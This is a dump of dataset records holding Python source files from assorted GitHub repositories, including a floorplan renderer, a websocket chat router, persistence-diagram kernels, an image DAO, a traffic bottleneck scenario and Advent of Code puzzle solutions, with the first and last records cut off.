step_size):\n line = ((x, y_start), (x, y_end))\n draw.line(line, fill=Const.GRAY_LIGHT)\n x_start = 0\n x_end = image.width\n for y in range(0, image.height, step_size):\n line = ((x_start, y), (x_end, y))\n draw.line(line, fill=Const.GRAY_LIGHT)\n draw.line(((0, 0), (height, 0)), fill=0, width=3)\n draw.line(((0, 0), (0, width)), fill=0, width=3)\n draw.line(((height, width), (height, 0)), fill=0, width=3)\n draw.line(((height, width), (0, width)), fill=0, width=3)\n\n for box in room.boxes:\n a = box.anchor\n draw.rectangle(\n (\n a[0] * Const.CELL_SIZE,\n a[1] * Const.CELL_SIZE,\n a[0] * Const.CELL_SIZE + Const.CELL_SIZE,\n a[1] * Const.CELL_SIZE + Const.CELL_SIZE,\n ),\n fill=tuple(box.color),\n outline=(0),\n )\n draw.text(\n (a[0] * Const.CELL_SIZE + 4, a[1] * Const.CELL_SIZE + 12),\n box.name,\n Const.WHITE,\n )\n for cable in room.cables:\n s = cable.start\n e = cable.end\n if cable.is_vertical:\n for i in range(1, cable.size + 1):\n draw.line(\n (\n (s[0] * Const.CELL_SIZE + 4 * i, s[1] * Const.CELL_SIZE + 4),\n (e[0] * Const.CELL_SIZE + 4 * i, e[1] * Const.CELL_SIZE + 4),\n ),\n fill=Const.RED_NORMAL if i == 1 else Const.RED_DARK,\n width=1,\n )\n else:\n for i in range(1, cable.size + 1):\n draw.line(\n (\n (s[0] * Const.CELL_SIZE + 4, s[1] * Const.CELL_SIZE + 4 * i),\n (e[0] * Const.CELL_SIZE + 4, e[1] * Const.CELL_SIZE + 4 * i),\n ),\n fill=Const.RED_NORMAL if i == 1 else Const.RED_DARK,\n width=1,\n )\n for door in room.doors:\n o = door.on\n a = door.at\n if door.on == \"left\":\n draw.line(\n (\n (0, (a - 1) * Const.CELL_SIZE),\n (0, (a + 1) * Const.CELL_SIZE),\n ),\n fill=Const.GRAY_LIGHT,\n width=5,\n )\n elif door.on == \"right\":\n draw.line(\n (\n (width, (a - 1) * Const.CELL_SIZE),\n (width, (a + 1) * Const.CELL_SIZE),\n ),\n fill=Const.GRAY_LIGHT,\n width=5,\n )\n elif door.on == \"top\":\n draw.line(\n (\n ((a - 1) * Const.CELL_SIZE, 0),\n ((a + 1) * Const.CELL_SIZE, 0),\n ),\n fill=Const.GRAY_LIGHT,\n width=5,\n )\n elif door.on == \"bottom\":\n draw.line(\n (\n ((a - 1) * Const.CELL_SIZE, height),\n ((a + 1) * Const.CELL_SIZE, height),\n ),\n fill=Const.GRAY_LIGHT,\n width=5,\n )\n\n image.save(str(room.uid) + \".png\")\n\n\ndef main():\n assert len(sys.argv) == 2, \"Invalid arguments length\"\n global variables\n\n src = parseMacros(sys.argv[1])\n\n # Handle nested loops\n tmp_src = []\n while True:\n tmp_src = parseLoops(src)\n if tmp_src != src:\n src = tmp_src\n continue\n break\n\n # Handle nested ifs\n tmp_src = []\n while True:\n tmp_src = parseConditionals(src)\n if tmp_src != src:\n src = tmp_src\n continue\n break\n\n srcf = \"precompiled.src.floor\"\n with open(srcf, \"w\") as f:\n f.writelines(src)\n\n # Vars and Consts can be parsed only after the src is flattened\n variables = parseVariables(srcf)\n parseMath(srcf)\n\n rooms = parseRooms(srcf)\n drawRooms(rooms)\n\n\nif __name__ == \"__main__\":\n variables = []\n main()\n","repo_name":"ZenT3600/floorplanner","sub_path":"floorplanner.py","file_name":"floorplanner.py","file_ext":"py","file_size_in_byte":24311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"14821049259","text":"from src.db import table\nfrom src.utils import Utils\n\n\nclass Routes:\n utils = Utils()\n\n def connect(self, id):\n data = {}\n data[\"connectionId\"] = id\n\n table.put_item(Item=data)\n\n return f\"{id} connected\"\n\n def disconnect(self, id):\n table.delete_item(Key={\"connectionId\": id})\n\n return f\"{id} has disconnected\"\n\n def setName(self, body, id):\n name = body.get(\"name\")\n\n validation = self.utils.validate(\n id,\n [\n {\n \"name\": \"Name\",\n \"value\": name,\n }\n ],\n )\n\n if validation != True:\n return validation\n else:\n users = table.scan()\n\n for user in users[\"Items\"]:\n if name == user.get(\"name\"):\n self.utils.response(id, \"The name is already in use\")\n return \"The name is already in use\"\n\n table.update_item(\n Key={\"connectionId\": id},\n UpdateExpression=\"SET #name=:n\",\n ExpressionAttributeNames={\"#name\": \"name\"},\n ExpressionAttributeValues={\":n\": name},\n )\n\n self.utils.response(id, \"Name setted\")\n\n return True\n\n def sendTo(self, body, id):\n if self.utils.checkName(id):\n to_id = body.get(\"to_id\")\n msg = body.get(\"message\")\n\n validation = self.utils.validate(\n id,\n [\n {\n \"name\": \"To_id\",\n \"value\": to_id,\n },\n {\n \"name\": \"Message\",\n \"value\": msg,\n },\n ],\n )\n\n if validation != True:\n return validation\n else:\n self.utils.response(to_id, msg, id)\n\n return True\n else:\n return \"Name not defined\"\n\n def sendToAll(self, body, id):\n if self.utils.checkName(id):\n msg = body.get(\"message\")\n\n validation = self.utils.validate(\n id,\n [\n {\n \"name\": \"Message\",\n \"value\": msg,\n }\n ],\n )\n\n if validation != True:\n return validation\n else:\n id_list = []\n\n users = table.scan()\n for user in users[\"Items\"]:\n cid = user[\"connectionId\"]\n id_list.append(cid) if cid not in id_list else id_list\n\n self.utils.response(id_list, msg, id)\n\n return True\n else:\n return \"Name not defined\"\n\n def default(self, id):\n self.utils.response(id, \"Action not allowed\")\n\n return \"Action not allowed\"\n","repo_name":"Zapodask/lambda-websockets-chat","sub_path":"src/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"28999683994","text":"voltas = 0\nmaiores = 0\nhomens = 0\nfemsub20 = 0\nflag = 'S'\n\nwhile True:\n voltas += 1\n sexo = str(input(f'Sexo {voltas}: ')).strip().upper()[0]\n idade = int(input(f'Idade {voltas}: '))\n\n if idade > 18:\n maiores += 1\n elif sexo == 'M':\n homens += 1\n elif sexo == 'F' and idade < 20:\n femsub20 += 1\n \n flag = str(input('Deseja continuar? ')).strip().upper()[0]\n if flag == 'N':\n break\n\nprint(f'''Seu programa achou os seguintes resultados:\n{maiores} pessoas com mais de 18 anos;\n{homens} pessoas do sexo masculino;\n{femsub20} mulheres abaixo dos 20 anos.\n''')","repo_name":"TT-Bone/guanabara-python","sub_path":"Exercícios/069.py","file_name":"069.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4618793674","text":"#odd 2k+1\r\nwhile True:\r\n a = raw_input(\"Inserte primer numero: \")\r\n b = raw_input(\"Inserte segundo numero: \")\r\n if a.isdigit() and b.isdigit():\r\n if int(a) < int(b):\r\n i = int(a)\r\n ans = 0\r\n while i <= int(b):\r\n if i % 2 == 0:\r\n i += 1\r\n else:\r\n ans += i\r\n i += 1\r\n print (ans)\r\n\r\n else:\r\n print(\"El primer numero NO debe ser mayor al segundo\")\r\n else:\r\n print (\"Invalido: Solo numeros.\")\r\n","repo_name":"MedMachine/Python_Basics","sub_path":"Conditions_and_loops.py","file_name":"Conditions_and_loops.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27645344318","text":"\"\"\"\nfunctions related to kernels of persistence diagram\n\"\"\"\n\nimport sys\nimport numpy as np\nimport time\nimport sklearn_tda as tda\nfrom joblib import Parallel, delayed\n\nfrom Esme.dgms.test import generate_swdgm\nfrom Esme.helper.format import precision_format\nfrom Esme.helper.time import timefunction\nfrom Esme.helper.others import assert_names\n\ndef sw(dgms1, dgms2, kernel_type='sw', parallel_flag=False, **featkwargs):\n \"\"\"\n :param dgms1: numpy array\n :param dgms2: numpy array\n :param parallel_flag:\n :param kernel_type:\n :param featkwargs: when kernel_type is sw, kwargs has n_d, bw\n when kernel_type is pss, kwargs has bw\n when kernel_type is wg, kwargs has bw, K,p\n :return: a computed kernel\n \"\"\"\n def arctan(C, p):\n return lambda x: C * np.arctan(np.power(x[1], p))\n import signal\n\n def signal_handler(signum, frame):\n raise Exception(\"Timed out!\")\n\n signal.signal(signal.SIGALRM, signal_handler)\n time_limit = max(int(len(dgms1)*len(dgms2)* 0.2),100)\n signal.alarm(time_limit)\n\n if parallel_flag==False:\n if kernel_type=='sw':\n assert_names(['n_directions', 'bw'], featkwargs)\n tda_kernel = tda.SlicedWassersteinKernel(num_directions=featkwargs['n_directions'], bandwidth=featkwargs['bw'])\n elif kernel_type=='pss':\n assert_names(['bw'], featkwargs)\n tda_kernel = tda.PersistenceScaleSpaceKernel(bandwidth=featkwargs['bw'])\n elif kernel_type == 'wg':\n assert_names(['bw', 'K', 'p'], featkwargs)\n tda_kernel = tda.PersistenceWeightedGaussianKernel(bandwidth=featkwargs['bw'], weight=arctan(featkwargs['K'], featkwargs['p']))\n elif kernel_type == 'pf':\n assert_names(['bw', 'bwf'], featkwargs)\n # try:\n tda_kernel = tda.PersistenceFisherKernel(bandwidth_fisher=featkwargs['bwf'], bandwidth=featkwargs['bw'])\n # except RuntimeWarning:\n # tda_kernel = 0\n # print('RuntimeWarning catched')\n # print(f'dgm1', dgms1)\n # print(f'dgm2', dgms2)\n else:\n print ('Unknown kernel for function sw')\n\n diags1 = dgms1; diags2 = dgms2\n X = tda_kernel.fit(diags1)\n Y = tda_kernel.transform(diags2)\n Y = np.nan_to_num(Y) # todo wait for mathieu's reply\n return Y\n\n\n@timefunction\ndef sw_parallel(dgms1, dgms2, kernel_type='sw', parallel_flag=True, granularity=25, **featkwargs):\n \"\"\"\n build on top of function sw\n\n :param dgms1: a list of array.\n :param dgms2:\n :param kernel_type: sw, pss, wg\n :param parallel_flag: Ture if want to compute in parallel\n :param granularity: parameter for parallel computing.\n :param featkwargs: kwargs for sw/pss/wg\n :return:\n \"\"\"\n\n t1 = time.time()\n assert_sw_dgm(dgms1)\n assert_sw_dgm(dgms2)\n n1 = len(dgms1); n2 = len(dgms2)\n kernel = np.zeros((n2, n1))\n\n if parallel_flag:\n # parallel version\n kernel = Parallel(n_jobs=-1, backend='multiprocessing')(delayed(sw)(dgms1, dgms2[i:min(i+granularity, n2)], kernel_type=kernel_type,\n **featkwargs) for i in range(0, n2, granularity))\n kernel = (np.vstack(kernel))\n else: # used as verification\n for i in range(n2):\n kernel[i] = sw(dgms1, [dgms2[i]], kernel_type=kernel_type, **featkwargs)\n\n t = precision_format(time.time()-t1, 1)\n print('Finish computing %s kernel of shape %s. Takes %s'%(kernel_type, kernel.shape, t))\n return (kernel/float(np.max(kernel)), t)\n\ndef sw_parallel_test():\n dgms1 = generate_swdgm(1000)\n dummy_kwargs = {'K':1, 'p':1}\n serial_kernel = sw_parallel(dgms1, dgms1, bw=1, parallel_flag=False, **dummy_kwargs)[0]\n parallel_kernel = sw_parallel(dgms1, dgms1, bw=1, parallel_flag=True, **dummy_kwargs)[0]\n diff = serial_kernel - parallel_kernel\n assert np.max(diff) < 1e-5\n\ndef assert_sw_dgm(dgms):\n # check sw_dgm is a list array\n # assert_sw_dgm(generate_swdgm(10))\n assert type(dgms)==list\n for dgm in dgms:\n try:\n if len(dgm) > 0:\n assert np.shape(dgm)[1]==2\n else:\n print('There exist empty dgm in dgms')\n except AssertionError:\n print('Not the right format for sw. Should be a list of array')\n\ndef random_dgms(n=10):\n dgm_list = []\n for i in range(n):\n dgm = np.random.random((10,2))\n dgm_list.append(dgm)\n return dgm_list\n\n\nif __name__ == '__main__':\n dgms1 = generate_swdgm(100)\n # dummy_kwargs = {'n_directions':10, 'bw':1}\n dummy_kwargs = {'bwf':1, 'bw':1}\n print('serial kernel\\n' + '-'*50)\n serial_kernel = sw_parallel(dgms1, dgms1, kernel_type='pf', parallel_flag=False, **dummy_kwargs)[0]\n print('parallel kernel\\n' + '-'*50)\n parallel_kernel = sw_parallel(dgms1, dgms1, kernel_type='pf', parallel_flag=True, **dummy_kwargs)[0]\n print(serial_kernel, parallel_kernel)\n diff = serial_kernel - parallel_kernel\n print(f'max diff is {np.max(diff)}' )\n assert np.max(diff) < 1e-5\n sys.exit()\n\n dgms1 = random_dgms(300)\n kwargs = {'n_directions':10, 'bandwidth':1.0, 'K':1, 'p':1}\n print(sw_parallel(dgms1, dgms1, parallel_flag=False, kernel_type='sw', **kwargs))\n","repo_name":"Chen-Cai-OSU/Esme","sub_path":"Esme/dgms/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":5333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"11475377899","text":"#!/usr/bin/env python\n\"\"\"drawing_comp_short.py: Draw a complete graph.\n\"\"\"\nimport colorsys\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\nplt.axes().set_aspect('equal', 'datalim')\n\nnum_nodes = 17\nG = nx.complete_graph(num_nodes)\npos = nx.circular_layout(G)\nncolors = [colorsys.hsv_to_rgb(h / num_nodes, 1.0, 1.0)\n for h in range(num_nodes)]\nnx.draw_networkx(G, pos, node_color=ncolors)\nplt.show()\n","repo_name":"showa-yojyo/notebook","sub_path":"doc/source/_sample/networkx/drawing_comp_short.py","file_name":"drawing_comp_short.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"}
+{"seq_id":"2024681506","text":"from time import time\n\nfrom aspects import Aspect\nfrom program import Program\nfrom typing import Iterable, List, Optional\n\nfrom results import Results, Result\n\n\nclass Runner:\n def __init__(self,\n programs: Iterable[Program],\n aspects: Optional[Iterable[Aspect]]=None):\n self.aspects: List[Aspect] = list(aspects or ())\n self.programs: List[Program] = list(programs)\n\n def run(self) -> Results:\n results = Results()\n\n for program in self.programs:\n results.add_result(self.test_program(program))\n\n return results\n\n def test_program(self, program: Program) -> Result:\n for aspect in self.aspects:\n aspect.prepare(program)\n\n before = time()\n return_value = program.execute()\n after = time()\n\n result = Result(program, return_value, after - before)\n\n for aspect in self.aspects:\n aspect.examine(result)\n\n return result\n","repo_name":"lucasmoeskops/test-runner","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27001129811","text":"import sys; sys.stdin = open('input_data/2817.txt',\"r\")\n\ndef BBJH(idx, total):\n global count\n if idx == length:\n if total == want:\n count += 1\n return\n if total > want:\n return\n BBJH(idx+1, total + numbers[idx])\n BBJH(idx+1, total)\n\nfor t in range(1,int(input())+1):\n length, want = list(map(int, input().split()))\n numbers = list(map(int, input().split()))\n count = 0\n BBJH(0, 0)\n print('#{} {}'.format(t, count))\n\n\n","repo_name":"AshOil/APS","sub_path":"SWEA/D3/2817_부분 수열의 합.py","file_name":"2817_부분 수열의 합.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72290322466","text":"import psycopg2\nfrom dao.base_dao import BaseDAO\nfrom dao.model.incoming_image import incoming_image\n\nclass IncomingImageDAO(BaseDAO):\n \"\"\"\n Handles interaction with raw images captured by the plane. Ros_ingest interacts\n with this DAO directly. On the REST side, most of its functionality is accessed through\n the /image/raw endpoint and the raw_image_handler module\n \"\"\"\n\n def __init__(self, configFilePath):\n super(IncomingImageDAO, self).__init__(configFilePath)\n \n def addImage(self, incomingImage):\n \"\"\"\n Adds the specified image to the incoming_image table\n @type incomingImage: incoming_image\n @param incomingImage: The image to add to the database\n\n @rtype: int\n @return: Id of image if successfully inserted, otherwise -1\n \"\"\"\n if incomingImage is None:\n return -1\n\n insertStmt = \"\"\"INSERT INTO incoming_image \n (time_stamp, focal_length, image_path, manual_tap, autonomous_tap) \n VALUES(to_timestamp(%s) AT TIME ZONE 'UTC', %s, %s, %s, %s) \n RETURNING image_id;\"\"\"\n return super(IncomingImageDAO, self).getResultingId(insertStmt, incomingImage.insertValues())\n\n def getImage(self, id):\n \"\"\"\n Attempts to get the image with the specified id\n\n @type id: int\n @param id: The id of the image to try and retrieve\n\n @rtype: incoming_image\n @return: An incoming_image with the info for that image if successfully found, otherwise None\n \"\"\"\n selectImgById = \"\"\"SELECT image_id, date_part('epoch', time_stamp), focal_length, image_path, manual_tap, autonomous_tap \n FROM incoming_image \n WHERE image_id = %s \n LIMIT 1;\"\"\"\n selectedImage = super(IncomingImageDAO, self).basicTopSelect(selectImgById, (id,))\n \n if selectedImage is None:\n return None\n return incoming_image(selectedImage)\n\n def getNextImage(self, manual):\n \"\"\"\n Attempts to get the next raw image not handled by the specified mode (manual or autonomous)\n\n @type manual: boolean\n @param manual: Whether to try and get the next image in manual's queue (True) or the autonomous queue (False)\n\n @rtype: incoming_image\n @return: An incoming_image with the info for that image if successfully found, otherwise None\n \"\"\"\n\n # step 1: claim an image if possible:\n updateStmt = None\n if manual:\n updateStmt = \"\"\"UPDATE incoming_image \n SET manual_tap = TRUE \n WHERE image_id = (\n SELECT image_id \n FROM incoming_image \n WHERE manual_tap = FALSE \n ORDER BY image_id LIMIT 1\n ) RETURNING image_id;\"\"\"\n else:\n updateStmt = \"\"\"UPDATE incoming_image \n SET autonomous_tap = TRUE \n WHERE image_id = (\n SELECT image_id \n FROM incoming_image \n WHERE autonomous_tap = FALSE \n ORDER BY image_id LIMIT 1\n ) RETURNING image_id;\"\"\"\n\n cur = self.conn.cursor()\n cur.execute(updateStmt)\n\n row = cur.fetchone()\n if row is not None:\n # step 2: get the claimed image\n claimedId = row[0]\n cur.close()\n return self.getImage(claimedId)\n\n cur.close()\n # return none if we failed to claim an image\n return None\n\n def getAll(self):\n \"\"\"\n Get info on all images currently in the table. Currently just used\n for testing\n \"\"\"\n selectAllSql = \"\"\"SELECT image_id, date_part('epoch', time_stamp), focal_length, image_path, manual_tap, autonomous_tap \n FROM incoming_image;\"\"\"\n\n cur = self.conn.cursor()\n cur.execute(selectAllSql)\n results = []\n for row in cur:\n incomingImg = incoming_image(row)\n results.append(incomingImg)\n\n return results","repo_name":"BYU-AUVSI/imaging","sub_path":"server/src/dao/incoming_image_dao.py","file_name":"incoming_image_dao.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14817326189","text":"# https://www.geeksforgeeks.org/get-post-requests-using-python/\n# importing the requests library \nimport requests \nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nsymbols=[\"QQQ\",\"AAPL\",\"JMIA\",\"NIO\",\"PTON\",\"OPEN\",\"TSLA\",\"U\",\"MRNA\"]\nsymbols=[\"ACB\",\"FUBO\",\"JMIA\",\"QS\",\"NIO\",\"ARRY\",\"OPEN\",\"MRNA\"]\ndef match_call_put(calls,puts,use_ask=True):\n n_calls = len(calls)\n n_puts = len(puts)\n out_calls=[]\n out_puts=[]\n out_calls_iv=[]\n out_puts_iv=[]\n out_strike=[]\n last = 0\n for i in range(n_calls):\n strike_call = calls[i]['strike']\n for j in range(n_puts-last):\n j=j+last\n strike_put = puts[j]['strike']\n if strike_call == strike_put:\n out_strike.append(strike_call)\n try:\n if use_ask:#((calls[i]['ask']+calls[i]['bid'])/2.>> from flow.core.params import NetParams\n >>> from flow.core.params import VehicleParams\n >>> from flow.core.params import InitialConfig\n >>> from flow.scenarios import BottleneckScenario\n >>>\n >>> scenario = BottleneckScenario(\n >>> name='bottleneck',\n >>> vehicles=VehicleParams(),\n >>> net_params=NetParams(\n >>> additional_params={\n >>> 'scaling': 1,\n >>> 'speed_limit': 1,\n >>> },\n >>> no_internal_links=False # we want junctions\n >>> )\n >>> )\n \"\"\"\n\n def __init__(self,\n name,\n vehicles,\n net_params,\n initial_config=InitialConfig(),\n traffic_lights=TrafficLightParams()):\n \"\"\"Instantiate the scenario class.\"\"\"\n for p in ADDITIONAL_NET_PARAMS.keys():\n if p not in net_params.additional_params:\n raise KeyError('Network parameter \"{}\" not supplied'.format(p))\n\n super().__init__(name, vehicles, net_params, initial_config,\n traffic_lights)\n\n def specify_nodes(self, net_params):\n \"\"\"See parent class.\"\"\"\n nodes = [\n {\n \"id\": \"1\",\n \"x\": 0,\n \"y\": 0\n }, # pre-toll\n {\n \"id\": \"2\",\n \"x\": 100,\n \"y\": 0\n }, # toll\n\n ] # post-merge2\n return nodes\n\n def specify_edges(self, net_params):\n \"\"\"See parent class.\"\"\"\n scaling = net_params.additional_params.get(\"scaling\", 1)\n speed = net_params.additional_params['speed_limit']\n assert (isinstance(scaling, int)), \"Scaling must be an int\"\n\n edges = [\n {\n \"id\": \"1\",\n \"from\": \"1\",\n \"to\": \"2\",\n \"length\": 100,\n \"spreadType\": \"center\",\n \"numLanes\": 2 * scaling,\n \"speed\": speed\n },\n ]\n\n return edges\n\n def specify_connections(self, net_params):\n \"\"\"See parent class.\"\"\"\n conn_dic = {}\n conn = []\n for i in range(2):\n conn += [{\n \"from\": \"1\",\n \"to\": \"2\",\n \"fromLane\": i,\n \"toLane\": int(np.floor(i / 2))\n }]\n conn_dic[\"2\"] = conn\n return conn_dic\n\n def specify_routes(self, net_params):\n \"\"\"See parent class.\"\"\"\n rts = {\n \"1\": [\"1\", \"2\"],\n \"2\": [\"2\"],\n }\n\n return rts\n\n def specify_edge_starts(self):\n \"\"\"See parent class.\"\"\"\n return [(\"1\", 0), (\"2\", 100)]\n","repo_name":"eugenevinitsky/decentralized_bottlenecks","sub_path":"flow/scenarios/simple_bottleneck.py","file_name":"simple_bottleneck.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"31490852718","text":"\"\"\"\nA crack team of love scientists from OkEros (a hot new dating site) have\ndevised a way to represent dating profiles as rectangles on a two-dimensional\nplane.\nThey need help writing an algorithm to find the intersection of two users'\nlove rectangles. They suspect finding that intersection is the key to a\nmatching algorithm so powerful it will cause an immediate acquisition by\nGoogle or Facebook or Obama or something.\n\nWrite a function to find the rectangular intersection of two given\nlove rectangles.\n\n\"\"\"\n\n\ndef get_intersection(dict1, dict2):\n \"\"\"\n Find the rectangular intersection of two given rectangles.\n\n >>> rectangle1 = {\n ... 'left_x': 1,\n ... 'bottom_y': 1,\n ... # width and height\n ... 'width': 6,\n ... 'height': 3,\n ... }\n >>> rectangle2 = {\n ... # coordinates of bottom-left corner\n ... 'left_x': 5,\n ... 'bottom_y': 2,\n ... # width and height\n ... 'width': 3,\n ... 'height': 6,\n ... }\n >>> get_intersection(rectangle1, rectangle2)\n {'left_x': 5, 'bottom_y': 2, 'width': 2, 'height': 2}\n >>> rectangle1 = {\n ... 'left_x': 1,\n ... 'bottom_y': 1,\n ... # width and height\n ... 'width': 2,\n ... 'height': 2,\n ... }\n >>> rectangle2 = {\n ... # coordinates of bottom-left corner\n ... 'left_x': 5,\n ... 'bottom_y': 3,\n ... # width and height\n ... 'width': 3,\n ... 'height': 6,\n ... }\n >>> get_intersection(rectangle1, rectangle2)\n {'left_x': None, 'bottom_y': None, 'width': None, 'height': None}\n\n \"\"\"\n love_rectangle = {\n 'left_x': None,\n 'bottom_y': None,\n 'width': None,\n 'height': None\n }\n love_rectangle['left_x'], love_rectangle['width'] = find_overlap(\n dict1['left_x'], dict1['width'], dict2['left_x'], dict2['width'])\n\n love_rectangle['bottom_y'], love_rectangle['height'] = find_overlap(\n dict1['bottom_y'], dict1['height'], dict2['bottom_y'], dict2['height'])\n\n return love_rectangle\n\n\ndef find_overlap(start1, length1, start2, length2):\n \"\"\"Find overlapping range between rectangle1 and rectangle2.\n\n >>> find_overlap(5,3,1,6)\n (5, 2)\n >>> find_overlap(5,3,1,2)\n (None, None)\n \"\"\"\n bottom_right1 = start1 + length1\n bottom_right2 = start2 + length2\n # find lowest (\"leftmost\") range end:\n highest_bottom_left = max(start1, start2)\n # find highest (\"rightmost\") range start:\n lowest_bottom_right = min(bottom_right1, bottom_right2)\n # edge case: no intersection\n if lowest_bottom_right <= highest_bottom_left:\n return (None, None)\n overlap_width = lowest_bottom_right - highest_bottom_left\n\n return (highest_bottom_left, overlap_width) # return start point, lenght\n","repo_name":"mbichoffe/coding_challenges","sub_path":"find_rectangles_intersection.py","file_name":"find_rectangles_intersection.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22863116267","text":"import easygui\nimport time\nimport math\n\n\nAOCDAY = \"24\"\n\ndef readFile(fileName):\n # Reads the file at fileName and returns a list of lines stripped of newlines\n with open(fileName, \"r\") as file:\n lines = file.readlines()\n for i in range(len(lines)):\n lines[i] = lines[i].rstrip()\n return lines\n\ndef bioDiversity(generation):\n value = 1\n score = 0\n for y in range(len(generation)):\n for x in range(len(generation[0])):\n if generation[y][x] == \"#\":\n score += value\n value *= 2\n return score\n\ndef nextGeneration(generation):\n next = []\n for y in range(len(generation)):\n newLine = []\n for x in range(len(generation[0])):\n neighbours = 0\n if y > 0 and generation[y-1][x] == \"#\":\n neighbours += 1\n if y < len(generation) - 1 and generation[y+1][x] == \"#\":\n neighbours += 1\n if x > 0 and generation[y][x-1] == \"#\":\n neighbours += 1\n if x < len(generation[0]) - 1 and generation[y][x+1] == \"#\":\n neighbours += 1\n if generation[y][x] == \"#\":\n if neighbours == 1:\n newLine.append(\"#\")\n else:\n newLine.append(\".\")\n else:\n if neighbours == 1 or neighbours == 2:\n newLine.append(\"#\")\n else:\n newLine.append(\".\")\n next.append(newLine)\n return next\n\ndef part1(lines):\n # Code the solution to part 1 here, returning the answer as a string\n eris = []\n for line in lines:\n newLine = []\n for spot in line:\n newLine.append(spot)\n eris.append(newLine)\n seen = [bioDiversity(eris)]\n while True:\n eris = nextGeneration(eris)\n score = bioDiversity(eris)\n if score in seen:\n # # Uncomment next 3 lines to print out last generation.\n # print(\"-----\")\n # for line in eris:\n # print(\"\".join(line))\n return score\n else:\n seen.append(score)\n # # Uncomment next 3 lines to print out generations.\n # print(\"-----\")\n # for line in eris:\n # print(\"\".join(line))\n \ndef outerCount(generation2D):\n top_count = 0\n bottom_count = 0\n right_count = 0\n left_count = 0\n for i in range(5):\n if generation2D [0][i] == '#':\n top_count += 1\n if generation2D [-1][i] == '#':\n bottom_count += 1\n if generation2D [i][0] == '#':\n left_count += 1\n if generation2D [i][-1] == '#':\n right_count += 1\n return [top_count,bottom_count,left_count,right_count]\n\ndef innerCount(generation2D):\n top_count = 0\n bottom_count = 0\n right_count = 0\n left_count = 0\n \n if generation2D [1][2] == '#':\n top_count += 1\n if generation2D [3][2] == '#':\n bottom_count += 1\n if generation2D [2][1] == '#':\n left_count += 1\n if generation2D [2][3] == '#':\n right_count += 1\n return [top_count,bottom_count,left_count,right_count]\n\ndef nextGeneration3D(generation3D):\n next = []\n next.append([[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"]])\n top_count,bottom_count,left_count,right_count = outerCount(generation3D[0])\n if top_count == 1 or top_count == 2:\n next[0][1][2] = '#'\n if bottom_count == 1 or bottom_count == 2:\n next[0][3][2] = '#'\n if left_count == 1 or left_count == 2:\n next[0][2][1] = '#'\n if right_count == 1 or right_count == 2:\n next[0][2][3] = '#'\n for z in range(len(generation3D)):\n newPlane = []\n if z > 0:\n top_count,bottom_count,left_count,right_count = innerCount(generation3D[z-1])\n else:\n top_count = 0\n bottom_count = 0\n left_count = 0\n right_count = 0\n if z < len(generation3D)-1:\n innertop_count,innerbottom_count,innerleft_count,innerright_count = outerCount(generation3D[z+1])\n else:\n innertop_count = 0\n innerbottom_count = 0\n innerleft_count = 0\n innerright_count = 0\n for y in range(len(generation3D[z])):\n newLine = []\n for x in range(len(generation3D[z][0])):\n neighbours = 0\n if y > 0 and generation3D[z][y-1][x] == \"#\":\n neighbours += 1\n if y == 0:\n neighbours += top_count\n if y < len(generation3D[z]) - 1 and generation3D[z][y+1][x] == \"#\":\n neighbours += 1\n if y == 4: \n neighbours += bottom_count\n if x > 0 and generation3D[z][y][x-1] == \"#\":\n neighbours += 1\n if x == 0:\n neighbours += left_count\n if x < len(generation3D[z][0]) - 1 and generation3D[z][y][x+1] == \"#\":\n neighbours += 1\n if x == 4:\n neighbours += right_count\n if y == 1 and x == 2:\n neighbours += innertop_count\n if y == 3 and x == 2:\n neighbours += innerbottom_count\n if y == 2 and x == 1:\n neighbours += innerleft_count\n if y == 2 and x == 3:\n neighbours += innerright_count\n if y == 2 and x == 2:\n neighbours = 10\n\n if generation3D[z][y][x] == \"#\":\n if neighbours == 1:\n newLine.append(\"#\")\n else:\n newLine.append(\".\")\n else:\n if neighbours == 1 or neighbours == 2:\n newLine.append(\"#\")\n else:\n newLine.append(\".\")\n newPlane.append(newLine)\n next.append(newPlane)\n next.append([[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"]])\n innertop_count,innerbottom_count,innerleft_count,innerright_count = innerCount(generation3D[-1])\n if innertop_count == 1:\n for i in range(5):\n next[-1][0][i] = \"#\"\n if innerbottom_count == 1:\n for i in range(5):\n next[-1][-1][i] = \"#\"\n if innerleft_count == 1:\n for i in range(5):\n next[-1][i][0] = \"#\"\n if innerright_count == 1:\n for i in range(5):\n next[-1][i][-1] = \"#\"\n\n return next\n\n\ndef part2(lines):\n # Code the solution to part 2 here, returning the answer as 